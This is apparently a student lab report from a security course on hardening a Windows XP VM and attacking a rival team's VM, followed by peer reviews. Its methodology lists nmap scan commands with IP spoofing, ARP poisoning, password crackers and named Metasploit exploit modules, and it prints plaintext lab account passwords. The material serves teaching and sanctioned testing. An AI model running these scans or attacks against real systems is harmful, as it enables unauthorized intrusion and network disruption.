Abstract
There is a fine line in securing a system and maintaining the usability of that system. A system can be secured to the point of being nearly impenetrable, but this can drastically reduce the ability to use the system to accomplish the tasks that are needed. In this final lab for this class, the team will be taking a computer that was created in the first lab and harden that system using a NIST document. Then for a second part of this lab the team will attempt to penetrate another team’s computer and implant a text file in the root drive of that system announcing the success. Forensic evaluations will be done on systems that have been compromised and an explanation of all the attacks will be recorded.
Literature Review
This lab’s given literature has some type of connection to forensics on penetration testing. These papers discuss proposed classes that teach about how to detect malicious attacks and how to perform analysis on existing software to discover malicious activity. The articles also deal with automated systems that automate penetration testing and also an overview of forensics. There is also an article about obscuring blackbox testing. These articles are a good way to help in obscuring any attacks that will be performed in this lab.
In Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008), the writers propose a computer course on computer security and defense. The writers first purpose giving a course that teaches computer viruses, but because of controversy over teaching students how to write malicious code they decided on a course that teaches how to defend against malicious software like viruses. Teaching students how to write malicious software should not be completely given up though. If a student knows how a piece of malicious software is written then the student knows what to look for when doing any type of auditing on some software and how to defend against that software better. In the abstract the writers keep referring to a compiler course, but they do not give any type of explanation of this course. The writers should have ether given a brief explanation of this course or left this section out. The writers explain in the introduction that the course examines more than pattern recognition that anti-virus software used to do and study program analysis. The course teaches two key concepts: computer security and software analysis. To test how effective the course would be the writers set up the course in two colleges and studied the reaction the course had on the computer science department and students. One of the colleges was a large research university and a small private liberal arts college. The course was based on a machine language evaluation course, so that tools used in the course would have to be made from scratch. The course uses the Phoenix compiler developed by Microsoft as the machine code compiler. In the course the instructors teach the mechanisms of how a virus works without teaching how to write the malicious code. The course uses old DOS era fragments of viruses to teach the structure of viruses. Using DOS era virus fragments does not allow for modern day malicious scripts, which are written in many other languages and environments, to be examined. In the course the students do learn how to detect malicious software through pattern recognition. The paper goes on showing different concepts that would be taught in the course and giving examples of them. One of the ideas that the writers introduce are the idea of obfuscating code by inserting random code that does not accomplish anything to break patterns that anti-virus software would detect. The university that the course used was the University of Virginia. At this college the course was setup with a capacity of 50 students. The students were given a Windows XP machine with Cygwin with lex, the Phoenix compiler suite, and Microsoft Virtual PC. The virtual environment was set up for security measures. The Phoenix assignments showed particular enthusiasm, so part of the course was revised to incorporate more Phoenix assignments. After some more refinement of the course the class was again given a couple of years later. The course was as popular if not more as before. The writers did not mention how the students did in the course though. The second college was a private liberal arts college called Hamilton College. This college was more selective in its students so the college was a lot smaller and the course did not have as many students in it. The students also did not have as much training as the students at the university. The writers seemed to drop the ball on this part of the paper. They did not mention any results of teaching the course at the Hamilton College, so there were no results from this study. In the prior work section of the paper the writers justify the reason they did not teach how to write malicious code. They mention that the techniques that are taught in their course were geared to not only do analysis on malicious software, but on other types of software as well. This paper shows how courses in studying malicious activities are beginning to be developed to counter the wide spreading threat of computer security. The current class that this lab is part of is similar in the fact that it is teaching the students to know how malicious attacks happen and also how to use these attacks to perform penetration tests on systems before they are compromised by someone with malicious intent. All these type of courses need to look at teaching this material in this way. This would increase the awareness of malicious activities and make these activities more of a risk and decrease the malicious activity going on out in the real world.
Like in the previous article, Cyberattacks: A Lab-Based Introduction to Computer Security (Minkley, 2006), the writers propose an introductory course in computer security. This course introduced the students to real malicious software in a controlled environment to teach them technical knowledge about computer security. The writers explain that the government is encouraging colleges to create courses like this to help in the awareness of computer security. They also explain that most of the courses that are geared to this concept are focusing on security professionals and not the general public. The course that the writers are proposing will be made for non-majors or students just beginning a major or minor. This course teaches the various types of malicious activities that are on the internet, knowledge of properties of networks and computer systems on that make an attack possible, the impact of an attack on a system, and how to maintain a computer to be more secure against today’s attacks. Because this course also teaches the students about the structure of networking and computers, this course makes non-technical users more aware of how computers can be compromised and gets them thinking about how to keep their computers more secure. The school that gave this course took great care in keeping the computers involved in this course isolated from the rest of the campus, because of the malicious software that would be introduced onto these computers. The course was divided up into two tracks that discussed the history of malicious attacks, ethical, and social issues of computer science and a lab based learning of security attacks and how to recover and prevent them. At the end of the course pairs of students in the class had to do a research paper on a question similar to questions given in the course. The paper gives examples of some of the papers that were written for the course. This research also included a poster on the research that they did. The writers then did an evaluation of the students that took the course. They looked at data gathered from the course and did surveys on the students before and after the course. The course showed a very high level of enthusiasm and attracted many students outside the IT field. The writers also did a survey on the first and last day of the course that showed the students knowledge and attitude towards computer security. The results did show a large increase in the awareness and knowledge of the different types of malicious activities. The paper also shows that when a survey of how often they do specific activities, like updating the operating system, clicking on pop-ups, and downloading music, the students behaviors did not change very much. Also a survey was done on the attitude of students that took the course on how hard it was to detect malicious activities. The results showed a small increase in the knowledge of how to detect and remove malicious software after the course. Follow-up surveys were also given to the students for the next year. This article was very similar to the Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008) article. This article, like the other, proposes a class on teaching defense against cyber attacks. This article though targets people starting in the IT field and people in fields outside the IT field. The class that this lab is associated to is meant for more advanced individuals in the IT field. Even though most classes that deal with teaching about malicious attacks and software are for individuals with higher knowledge in computer science does not mean that there should not be any classes for the lesser knowledgeable in the IT field. This subject should be known to everyone that uses a computer. The more people that are knowledgeable about this material the harder it will be for the attackers to access more systems.
Automated systems are being created to automate penetration testing. In the article, Breaking Blue: Automated Red Teaming Using Evolvable Simulations (Upton, Johnson, McDonald, 2004) is a continuation of a larger project in manual Red Teaming. This article is an introduction and proposal to a part of the project that is called AutoRedTeaming. This part of the project uses algorithms and simulations to try and overcome a security system. The paper begins off with a background explanation of what the concept of Red Teaming is. They give a good explanation of Red Teaming, but give a very broad explanation of the concept. The article explains that in this project they are developing an automated system that uses evolutionary algorithms and agent-based simulations to overcome proposed security procedures represented by a blue team. The paper then goes into an explanation of how they set up their scenario and ran their first simulation of the automated Red Teaming program. The paper only goes into a brief explanation of the setup and gives no results from the tests. A very similar project was proposed in lab two’s literature review called Automated Red Teaming: A Proposed Framework for Military Application (Seng, Lian, Su-Han Victor, 2007). The team revealed that they were limited in generating solutions using only parameters settings of the agents. The team is examining the idea of using changes in the simulation agent’s structures to overcome this obstacle. The team proposes using this automated system in evaluation of potential threat tactics. This idea of automated red teaming can be used as a first step, but it should never be used as an only step in determining threats against a system. These automated red teaming programs could be incorporated in cyberwarfare by developing programs that can do automated penetration testing of a system. Again this should not be the only step in performing a penetration test, but could be used to expose the most obvious vulnerabilities in a system. There are situations that cannot be tested with an automated penetration program, for example doing social engineering attacks on an organization.
Forensics can be used to analyze the integrity of a penetration test. In the article, Investigating Sophisticated Security Breaches, Eoghan Casey, gave an overview of what forensics is comprised of and the limitations that impact its effectiveness. The author of the article pointed out that most organizations are not properly configured to properly conduct a forensics operation (Eoghan, 2006, p.50).However; this was not the case in the lab environment that was set up by team four with the aid of a NIST document. The team set up several logs as a full blown siege was known to be underway. The author described some anti-forensics techniques such as deleting logs, altering data time stamps, or installing utilities such as root kits to subvert the operating system, which was encouraged in the laboratory assignment (Eoghan, 2006, p.49).If a team clearly saw that an attack was underway, they could contact the Professor and have their system taken offline for a few hours. The article seemed to be a secondary source article, for it addressed a topic by analyzing what other had to say about the subject.
The next article continues with the subject of obscuring testing by denying blackbox tests. In the article, A Protocol Preventing Blackbox Tests of Mobile Agents, Fritz Hohl and Kurt Rothermel described ways to prevent blackbox testing on systems that are blackboxes. The authors defined blackbox systems as systems that contain internal code and data that are invisible to attackers (Hohl & Rothermel, 1999, p.2). The article described two basic ways to prevent blackbox testing; avoid the occurrence of a series of input events that have already been executed and allow the existence of series of input events that have been executed before, but require them to produce the same results (Hohl et al., 1999, pp.4-5).The article used a few case studies to explain how blackbox testing would or would not work in the given scenarios. The article seemed somewhat hard to follow and proposed a registration protocol that accepts unknown interactions and would allow the agent continue execution (Hohl et al., 1999, p.7). In the lab exercise, the teams’ virtual machines are like the agents described in the article, for the attacker hits the agent with some sort of input via a command from a command prompt or run a tool against the agent to create a response or output. However, in the case of our lab, the teams are not concerned with whether the attacker used the same input technique repeatedly, but to make sure that enough services have been disabled to ensure that the system gives back useless data or no data back to the attacker.
Methodology
The purpose of this lab was to create a system that would be as secure as the rules of the lab would permit. Then for the second part of the lab, the team will attempt to penetrate one of the opposing team’s systems to see if they could implant a file in the root of that system without being discovered. To accomplish the first part of this lab the team chose the Windows XP SP3 VM to harden. Then the team acquired the NIST document SP800-68 and the NIST policy template that accompanies that NIST document. Using the NIST document the team hardened their system following each step outlined in the document and applied the accompanied security template of the NIST SP800-68 document. The team changed some of the policies outlined in the NIST document to fit the system to the scenario of this lab. The changes we did to the NIST policies included:
- Disabled file and print sharing.
- Uninstalled as many applications as possible.
- Turned on Windows XP’s firewall.
- Set the accounts lockout to 0.
- Accounts lockout was set to 3.
- Reset account lockout to reset after 30 minutes.
- Disabled, renamed, and changed the password of the guest account.
- Deleted all the accounts except the administrator account, user account, and the guest account.
- Set the interactive login to do not display user’s information.
- Retain the application, security, and systems logs for 5 days.
- Set up an account for the professor to access using remote desktop.
- User name: Liles
- Password: Ubermeister_581
- Renamed the administrator account, changed the password, and disabled the account
- User name: the_god_account
- Password: Ober_Ritter_353
- Changed the user account’s password
- User name: user
- Password: Hummels_Mund_353
- Changed the IP address from 192.168.4.1 to 192.168.4.44 and the IP address on the network was 205.215.116.33
The system was then turned on at 5:00 pm on Wednesday July 22, 2009 to be penetrated by the opposing teams. The system was kept online (because of a penalty on this team) until 5:00 am Sunday July 26, 2009. After the attacking session was over the system was evaluated to determine if it was penetrated. This was done by looking for a file that was left by the opposing team stating that they had accomplished the penetration and leaving a date and time in the file. This team was given an IP address of 205.215.116.44 for their penetration test against team five.
For the attack against the opposing team, this team performed the following attacks and some others that are not mentioned below:
- Wireshark
- Passive reconnaissance
- Network traffic was monitored with filters to watch
- The system that this team was trying to penetrate
- The opposing team that was attacking this team’s system
- Undetermined systems that were performing scans against this teams system and related systems.
- Passive reconnaissance
- p0f
- Passive reconnaissance on target system using the following commands
- p0f -i eth0 -p -S -r
- p0f -i eth0 -w /root/p0flog -p -s
- Passive reconnaissance on target system using the following commands
- EzPWN
- Active reconnaissance on target system and exploit attacks on system if vulnerability was discovered. The commands were set up as follows
- EzDB AutoPwn
- EzP0f -eth0, verbose, detect masquerade, full dump
- EzNmap TCXP connect (), Verbose, Don’t Ping, Only open ports
- EzAmap ports 1 – 2000
- EzHalbred -verbose -threading
- Active reconnaissance on target system and exploit attacks on system if vulnerability was discovered. The commands were set up as follows
- Nmap
- Active reconnaissance on target system with the following commands
- Nmap -sV -T Paranoid -sW -S 205.215.116.44
- Nmap -sU -O 205.215.116.44 -e eth0 -pN
- Nmap -T Insane – sV -sW -O 205.215.116.44
- Nmap -T Paranoid – sV -sU -sA -O 205.215.116.44
- Nmap -T Insane – sV -sU -sS -O 205.215.116.44
- Nmap -T Aggressive – A -v 205.215.116.44
- Nmap -T Insane – sV -sX -O 205.215.116.44
- Active reconnaissance on target system with the following commands
- Ettercap
- Passive reconnaissance on target system with the following command
- Ettercap -C
- Watched for 205.215.116.44 to appear and give us any information.
- Ettercap -C
- Passive reconnaissance on target system with the following command
- Nessus scan using most updated plug-ins
- Command TCP/IP commands
- Nbtstat
- Net use
- Third party remote login utilities using password crackers
- Brutus
- Remote system information
- Zen commander
- Metasploit
- Exploits against possible vulnerabilities on target system
- Ms03-026
- Ms04-045-wins
- Ms03-049-netapi
- Ms08-041-snapshotviewer
- Ms08-053-medinencoder
- Ms09-002-memory-corruption
- Gamesoft-telserv-username
- Goodtech-telnet
- Cain-abel-4918-rdp
- Exploits against possible vulnerabilities on target system
- Cain and Abel
- Passive reconnaissance using ARP poisoning.
The team utilized the passive reconnaissance tools to discover any useful data coming out of the target system or what operating system was used on that system. This was done, at first, with as much stealth as possible using IP address spoofing, ARP poisoning, and as much passive reconnaissance as possible. Then the team reverted to straight out aggressive active scans on the target system. After discovering only one port open, the team tried multiple exploits using Metasploit and other third party tools to penetrate that port. Other exploits were also tried that are usual exploits against Windows systems.
While this team was performing penetration on the target system, a constant monitor of this team’s system was kept up and logged. This involved monitoring the event logs of the system, applications, and security. Copies of these logs were kept. Also monitoring of the firewall logs was done. The firewall logs were kept in an encrypted file on this team’s system for future analysis. The team also monitored various activities using command prompt commands on their system to monitor changes on the network, for example ARP tables. Last the root drive of this teams system was monitored for the file that the opposing team was to leave declaring the success of the opposing team.
Results
Upon examination of this team’s system, it was discovered that multiple active scans were found analyzing the firewall logs. All the packets that were queried toward this team’s system were dropped by the firewall. No exploits were discovered against this team’s system. The team that was attempting to penetrate this team’s system declared a foul against this team. They stated that this team had put up a firewall after the second day of the penetration tests, which is a violation of the lab rules. The opposing team requested from the professor to investigate this team’s system and determine if the firewall was put up late. The professor was not able to remotely log into this team’s system, because the remote desktop interface was disabled. The professor requested that this team set up some means of remote login for him to access this team’s system. This team then proceeded to enable the remote desktop interface and created an account for the professor to log into. Because of the firewall logs that were kept, it was proven that the firewall was up before the penetration tests began.
Many passive reconnaissance tools were used in trying to discover any ports or what operating system was used on the target system. Performing these passive recons revealed at first that there were no passwords or useful data being passed from the target system. Also the operating system was not able to be determined. Passive reconnaissance of the target system turned out to be of little help, because of the lack in traffic from the target system. The target system was not being used as a normal system would, thus the system was not producing traffic from it.
After getting little to no results from the passive reconnaissance, the team tried to use active reconnaissance to discover any ports open or what operating system was used on the target system. The team used multiple well known tools, like Nessus and Nmap, to do active scans against the opposing team’s system. At first these scans were done with as much stealth as possible. The team used spoofing to avoid giving away the IP address that was performing the scan. Also the team scanned the target system using a slow scan that made the scan harder to detect. After being detected the team then reverted to aggressive active scans against the target system. After the second day, and after the team attacking this team’s system cried foul, a port for the remote desktop was discovered. This port that was discovered was port 3389. This port was exposed, but stated that it was closed. This team then researched many exploits against port 3389. The team tried multiple exploits and third party programs to get into their system through this port. This proved to be futile. Many other exploits were also tried that were common exploits in a Windows environment. The opposing team detected some of these exploits, but none of them were able to penetrate the target system.
After the penetration tests subsided, this team’s system was analyzed for a file that would declare that the opposing team did penetrate this team’s system. After looking throughout the whole system for this file, not just the root, it was discovered that the file did not exist. The team analyzed the event logs and the firewall logs and discovered many scans that were performed against this team’s system. These scans came not from one IP address but many different IP addresses. This team also evaluated the system to see if any exploits were attempted against this team’s system, but found none. In the end this team declared that they were unsuccessful in penetrating the target system and successful in not being penetrated by the opposing team.
Issues
There were a few issues that were encountered while conducting this laboratory exercise. The virtual machines were set up in a manner that did not resemble systems on a typical network, for they did not produce traffic, did not contain users or applications, and were hardened to the point of becoming totally useless from a functionality point of view. During the lab, team four was forced to change the remote login settings, which were previously disabled after following NIST guidelines, to a less secure setting. This could have lead to an opening for the attacking team to exploit.
Conclusion
After completing this laboratory assignment, team four has realized that operating systems themselves are not as inherently insecure as they are commonly made out to be. Without a successful passive or active reconnaissance of the target system, it was difficult launching attacks against it, for there were no criteria to base the attacks on. The team realized that turning operating systems into bastions via hardening recommendations made the systems impervious to attack but sacrificed a large amount of functionality. These systems that were hardened did not represent a real life scenario to test against. The systems that were hardened were not set up with any applications, except the necessary ones, to run exploits against. These applications that would be on a normal system would open up ports that the attacker could exploit. Also the hardened computers did not produce any traffic that could be monitored. This traffic would normally be produced by internet browsing and file sharing. The traffic could be used by the attacker to gain important necessary information to attack that system. This hardening of the system makes it look as though the computer is a standalone system. In general, it appeared that most of the teams were in a stalemate at the end of the laboratory exercise.
References
Bailey, M., Coleman, C. & Davidson, J. (2008).Defense against the dark arts.ACM.
Casey, E. (2006). Investigating sophisticated security breaches. ACM.
Hohl, F. & Rothermel, K. (1999). A protocol preventing blackbox tests of mobile agents.
Holland-Minkley, A. (2006).Cyberattacks: a lab-based introduction to computer security. ACM.
NIST. (2005). Guidance for securing windows xp systems for it professionals: a nist
configuration security checklist.
Upton, S., Johnson, S. & McDonald, M. (2004). Breaking blue: automated red teaming using
evolvable simulations.
As we all have learned throughout our undergraduate and graduate studies, you sacrifice security for usability. The abstract was not the required length as per the lab write-up given to us. BREAK UP YOUR PARAGRAPHS. Long paragraph make it harder for the audience to read. Break it up. The literature review was not cohesive in the least bit. It read like a list. The team just stated the articles name and then talked about the article. The professor told us numerous times NOT to do this. I don’t know about your comments that the professor gave you about your lab reports, but I know he has told other teams numerous times to not do this. For such long paragraphs and summaries about the articles, the team did not put citations in their literature review. What is NIST? Before putting acronyms you must spell out the acronym. I did not see the reasoning of putting the changes made in the lab report. This was done in previous labs and was not needed again. I am pretty sure that the system was supposed to be taken down before 5am on Sunday. The team did not follow the guidelines at all. From what team 4 states, they made a change on the system after the window started. This completely violates the rules for the lab experiment. Team 3 had every reason to cry foul. The professor was not even able to login to this team’s system. The account should have been made and tested before telling the professor that it existed. This means once again that the team did not follow the rules. I believe that with these problems, team 4’s lab report is invalid and nothing can be taken as word or as a learning program. Team 4 was not able to be stealthy when trying to put a file on team 5’s system. Team 5 was able to detect the attempted attacks. Team 4 stated issues that were already known. These were not real systems because they had no traffic running on them. The question is would traffic running make the systems more vulnerable? This team did not create a lab report that could be duplicated. The references were formatted oddly. The required tags were not included in the submission of the lab report. Overall, this team did not follow many of the requirements of a lab report. I would say that for next time to change the formatting, but there is not another lab report in the future.
The final lab presented by team four suffers from same two major problems that most other labs have suffered from. To begin with, the abstract presented by team four is not the required length. It does explain the process to be completed by team four, but it is not the minimum two paragraph length. The syllabus states that any abstract shorter than two paragraphs will be judged as poor scholarship. The literature review provided by team four is also lacking. Team four has suffered from problems with their literature review since lab one. The literature review provided by team four is nothing more than a list of reviewed articles, a short explanation of each, and APA style citations. The extremely long paragraphs presented in team four’s literature review make the review very hard to read and understand. I also see no link between articles reviewed, or any indication of a connection to the steps of the lab process. By not being able to create any measure of cohesion among any of articles reviewed throughout the entire course I am forced to question the academic nature of their lab reports entirely, and their level of commitment to the graduate level of scholarship required in this course. Due to the size of the literature review paragraphs I found that I was not able to completely read through the literature review, as it was very easy to get distracted by lack of any break in their writing. Team four does a good job of explaining the how and the what, like team three, of their methods section. They do kind of gloss over the who and the why, and completely miss the when and where of their discussion of methods. The point of an academic and scholarly methods section is to allow the experiment to be reproduced by anyone reading the write up that has the requisite knowledge. Without direct and concise answers to the questions of who, what, where, when, why, and how then reproduction for validation of the experiment is not possible. In the methods section, I am forced to question the bullet point on changing the IP address since it makes no sense to me. “Changed the IP address from 192.168.4.1 to 192.168.4.44 and the IP address on the network was 205.215.116.33.” Was the IP address changed from 192.168.4.1 to .4.44 or 205.215.116.33? This point makes no sense, and I question team fours understanding of IP networks. The findings section provided by team four show an overview of the items that team four found throughout the course of the lab, I agree with their findings as they are valid, and consistent with most findings from the reports by the other teams in the course. In the issues section of team four’s lab report, they list systems being hardened to the point of uselessness. I disagree with that issue. The VM locked down by team two was actually still very usable at the completion of the step to secure it, and at the completion of the lab. The conclusions presented by team four do not list anything about patch policy, with a good patch policy, automated exploits are generally almost impossible.
The abstract makes only passing mention about forensics at all. Since this lab is about forensics, or anti-forensics to be more precise, the activities of the lab should be related to anti-forensics. The literature review is, again, lengthy summaries of each of the assigned readings with little cohesion or comparison to the lab activities. Once exception to this was the discussion on the red teaming paper assigned in lab two. This showed good research on team four’s part. In addition to the summaries of the articles, team four does give their opinion on the content in the readings. The one paper that was tied to the lab activities was Eoghan Casey’s paper on security breaches, though the team makes the statement that it seemed to be a secondary article. This particular reading was what lab seven was all about.
Team four’s methodology described in detail the steps used to secure the machine and, unlike other groups, referenced the specific document that was used to select the specific security settings (though an APA in-text citation was not present.) The attacking details were also very well documented as to the specific commands or tools used but there was little detail or reasoning given for the specific exploits that were being attempted. The ordered lists are a good way of visualizing the various attack methods used but should be backed up with text describing what the purpose of each attack was. Also, in the methodologies, there are frequent mentions of “passive reconnaissance” being employed against the target system but no further detail is given. Is this just simply packet captures?
I agree with the issue that the target machines weren’t used enough to be considered “active” so that they generated network traffic. Had this been a requirement, it would have been possible to, at least, determine the operating system and possibly patch levels. This same idea is echoed again in the conclusion. The group mentions the lack of usability of their system but never makes any specific mentions of what particularly was difficult to use on it. Judging from the security methods implemented the system should have been able to browse the web, access file shares on other computers, and run standard productivity applications.
Team 4 did a nice job with their abstract in that it discussed what they intended to do in lab 7. I think more detail would have been beneficial. The introduction to their literature review gave a good summary of what the articles were about and how they related to lab 7. Their literature review itself, however, read like a list and summary of the articles and didn’t compare and contrast the literature to the lab activities.
The methods section is very detailed and does a good job of explaining how they plan to perform their testing. They did a real nice job of detailing their attacking methods. The way they listed their various attack methods was good in that it helped me to visualize what they were attempting to do.
I found team fours report for this exercise rather well done. The literature review was lengthy, and some issues noted in the previous exercise’s review were corrected. Additionally, the review was more than just a summary of articles, and some comparing amongst the articles was present, along with application to the exercise itself. The methodologies section was sufficiently detailed: I was left with few questions as to what this team had done or how it was accomplished. I also thought this team’s idea of encrypting log files an interesting idea, one which appeared to be a unique innovation which stood out from the rest of the other teams.
A few issues do exist with the write-up however. The literature review suffers from poor paragraph form: the massive paragraph style is still present from early writing, and is difficult to read. Further, it seems some of the information in the results section should be in the methodologies section. I realize this appears to be an issue in which all parties critiquing the writing will never be satisfied, as no consistent opinion emerges. We as team three have, due to criticism, moved nearly all “action based” activities into the ‘methodology’ section, and now receive complaints that items from the methodology sections belong in results: so, it truly may be a ‘no win’ situation for this team also in this regard.
I must comment that I believe this team showed real effort in pursuing an attack against their target. I think this team realized, although it is not specifically mentioned, that very little was to be gained by using passive means against the target under the circumstances. I think this is specifically apparent when this team switched from obfuscated scanning methods (such as ‘IP spoofing’) to direct attack. It seems other teams did not realize that the limitations of the environment also provided opportunity. For instance, a VM’s MAC address could be changed at whim; coupled with the DHCP present on the network used for the exercise, IP addresses essentially became ‘disposable.’ One could perform an active attack from one IP address with a VM, shutdown and change the MAC configurations, and assume a new IP address identity on the network. This showed, as this team apparently realized, that no real gain was to be had in using stealth in scanning or attempting network based exploits.
Finally, though I find the use of encryption for log files interesting, I wonder at the details of this arrangement. Did this team use the built in Windows EFS? If so, due to the automatic use of private keys associated with an account, this may have provided little additional security. See the description of the system here: http://technet.microsoft.com/en-us/library/bb457116.aspx . Specifically, if an attacker did succeed in gaining administrative privileges, assuming that these log files were encrypted using this account, they would have automatic access to these files. A further consideration: Microsoft indicates substantial overhead exists in maintaining an “on the fly” encrypted file; the overhead of this in conjunction with verbose recording settings might have opened up your system to an external logging induced denial of service attack. An interesting approach, nonetheless: I might investigate this matter further for practical application.
Team 4 begins their lab 7 report by discussing the tradeoff between security and usability. They then state their objectives for this lab. The first objective is to harden a system that they had created in lab 1 using a NIST document. The second objective is to attempt penetration on another team’s system. The third and final objective is to conduct a forensic evaluation of the system to determine any attacks which may have occurred.
Team 4 begins their literature review by stating that the assigned readings are somehow connected to forensics on penetration testing. This assessment I believe is a bit too specific. Although forensic evaluation is covered in the readings, the greater theme is on securing systems. The first article that they review is Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008). They describe this article as proposing a computer course on computer security and defense. Because of the controversy involved in the class, students were taught more from a defense perspective than an attack perspective. They relate this article to our current course in the way that it teaches defense from the perspective of the attacker.
The next article that they review is Cyberattacks: A Lab-Based Introduction to Computer Security (Minkley, 2006). They describe this article as teaching security from a defense perspective. They relate the article to Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008) as both articles pertain to teaching how to defend a system. However Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008) is geared toward IT professionals. They defend the use of a system security class for non-IT professionals by stating that everyone who uses a computer should know how to defend it.
Team 4 continues their literature review with Breaking Blue: Automated Red Teaming Using Evolvable Simulations (Upton, Johnson, McDonald, 2004) and Red Teaming: A Proposed Framework for Military Application (Seng, Lian, Su-Han Victor, 2007). Team 4 takes the stand that automated red teaming can be used as a first step, but should not be the only method of analysis. I agree with this statement. A computer simulation cannot account for every possible way in which a system’s security can be breached. Human intervention is still needed for analysis.
Team 4 reviews the article Investigating Sophisticated Security Breaches (Eoghan, 2006) next. They describe the article as giving an overview of system forensics and the limitations that impact its effectiveness. The article points out that most organizations are not properly configured to conduct a forensics operation. They relate this to our current lab assignment and explain how their own target system has been set to include several logging mechanisms.
The last article that Team 4 reviewed is A Protocol Preventing Blackbox Tests of Mobile Agents (Hohl & Rothermel, 1999). They describe the article as offering two methods to prevent an attempted penetration using blackbox. They relate the article to our current lab, as we are attempting to prevent penetration from outside intruders.
Team 4 begins their methodology section by restating the objectives of this lab; to attempt to penetrate an opposing teams system while defending their own. They state that they chose the Windows XP SP3 system to harden as their target system. They hardened the system using NIST document SP800-68. Team 4 described several methods that they used to harden the system in addition to those contained within the NIST document. They also described several methods that they used in attempting to penetrate the opposing teams system. They give a good explanation of each method used.
In the results section Team 4 discusses the forensic evaluation of the system that they had set as a target. They detected numerous port scans of their system. They also mention that the team that was targeting their system questioned whether or not they had enabled a firewall during the exercise. Admittedly, some of the anomalous results of port scans may have been due to the massive amount of ARP poisoning and IP address spoofing that was occurring within the Citrix environment. Team 4 was able to prove that their system had the firewall enabled from the beginning of the exercise by the firewall logs.
Team 4 continues their results section by discussing their attempts to breach the system they were targeting. Passive reconnaissance methods proved unfruitful due to the lack of network traffic generated from the target machine. They used active reconnaissance methods in the use of port scanning and discovered port 3389 was open. They attempted several exploits on port 3389 but were unsuccessful in penetrating the target system. They do not include an explanation of the service that may be using port 3389.
Team 4 concludes by discussing how the target systems setup in this laboratory assignment were hardened to the point of being unusable. They conclude that operating systems left to themselves are secure. The systems become unsecure when applications and human intervention become involved. I agree with this assessment. Our own research through the various lab assignments has shown that security vulnerabilities come from the application layer of the OSI model, or from human interaction with the system.
The team starts off with their abstract for this lab and explains what is going to occur. The abstract was simple and to the point. They did make a brief point about how security affects usability but it was one sentence and was the second sentence of the paragraph. This is an interesting subject that keeps occurring in security. This could have been defined clearly and better setup the abstract if this was the first sentence. Next the team moves onto the literature review. By writing this each week it is assumed that the peer reviews are not read by this group. When reading the literature it was again broken apart by each individual piece of literature. There was a small paragraph at the beginning that described an overall combined subject of the papers. This should be expanded and the literature as a stepping stones to discuses the topic and the literature. When reading the reviews there is some discussion about them but most of it is just regurgitating what the author wrote in a more condensed version. Next the group moves onto the methodology section. Within this section they describe the steps they took to secure their machine. Then they described their plans to exploit team 5’s machine. They included the exploits they were going to use and the commands for each exploit. The next section went on to their findings. Within the findings section they described the attacks against the target system. Then also listed an issue that they had with a firewall on the target system, this should have been included within the issues and problem section. They go onto say that they tried to exploit one port that they found but were unsuccessful. Was the team looking for newer exploits besides the ones that were already programmed into the tools that they where using? Could this have changed the outcome? They go onto to give their issues and then conclude. In their conclusion, I am going to agree that this is not a real representation of how systems are and users are sending and receiving traffic more often. But this was also something to show how when systems are to secure they give up usability and this lesson can be learned for future use in the workplace. Yes, companies want their systems secure but at what cost till the system is unusable?
Team four’s abstract explains what will be done with the lab. It may be me, but something in the wording makes me uncomfortable. I can’t quite put my finger on it.
The team’s literature review is verbose. It makes attempts to discuss the relevancy of the articles and even hints at evaluative thought, but misses the mark repeatedly. Did Bailey et al really give up on examining viruses, or just integrate other things? What was the point of using DOS scripts? There was a reason. Holland-Minkley is one person. Her whole last name is Holland-Minkley. Why do you think Upton et al’s description of red teaming was so broad? Were they even really studying IT security, or was the idea a little more abstract? I didn’t see any case studies in Hohl and Rothermel. Where were they?
The team’s methods are repeatable where hardening the machine is concerned. Why did you have to uninstall applications? There should have been nothing on the machine. Did you make the account lockout 0 or 3? You state that there was an account set up for the professor to access the system. Was this originally configured and presented to Professor Liles as the lab instructed, or did the team do this retroactively in response to complaints?
The attack plan is unclear. You list several tools but don’t explain how you used them in your attack plan. Is ARP poisoning really passive reconnaissance? Did you run this attack? If so, it may explain the confusion on the part of team five and two where exploiting team one is concerned.
The team has information in their findings section that belongs in methods. You explain what you attempted and why passive scanning does not work. You need more separation when discussing the two sides of the lab. It is hard to tell who is scanning what.
In your issues section you complain that you were forced to change settings. However your inability to follow directions impacted the usability of your machine.
I think that group 4’s write-up for lab 7 was poor. The abstract for this lab was adequate and provided a short overview of the lab. The literary review was good and adequately reviewed the material. Group 2 answered all of the required questions for each reading. All of the citing for the literary review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail the steps they used to attempt to exploit a system. However, what they did was wrong. The group played around with a lot of tools that they shouldn’t have, unless they know how to use them. As other groups have stated it appears that a lot of ARP poisoning had been done (also indicating IP conflicts), which wasn’t needed (passive scanning can be performed in Ettercap without the need to poison). In fact it could be detrimental to other groups. By performing MITM attacks, a DoS could have been brought about. Also, I think this is where our IP address mix-up came about. ARP poisoning can have packets sent to the “host in the middle” if they are not re-arped correctly after poisoning. Did the group use an XP SP0 machine to perform the attacks? If so, this might give some speculation to what virtual machine Teams 2 and 5 ACTUALLY attacked. Overall, I feel that this lab was not performed correctly and COULD be to blame for IP mix-ups. Finally, the conclusion was adequate and summarizes what was covered.
Similar to other teams, this team also selected Windows XP SP3 as there machine to be exploited. This team followed two guidelines from NIST, SP800-68 and policy template that accompanies the document. The team gave a list of changes that were done to there machine. The team did what the other teams did to protect there Windows XP operating system. They disabled file and print sharing, turned on XP’s firewall, changed user accounts and passwords. This team did indicate that they changed the accounts lockout to zero and reset account lockout to reset after thirty minutes. Team three only had to accounts one admin and one user. This team renamed the administrator account, change the password, then disabled the account. It almost seems useless to modify the administrator account if the account is going to be disabled.
The team used several tools for attacking there opposing teams machine. They used a combination of wireshark, p0f, EzPWN, Nmap, Ettercap, Nessus, TCP/IP commands, password crackers, metasploit and Cain and Abel. The last tool mentioned, Cain and Abel
which does ARP poisoning, might explain why team one mentioned having problems with IP. This team reported no success with exploiting the other team’s machine.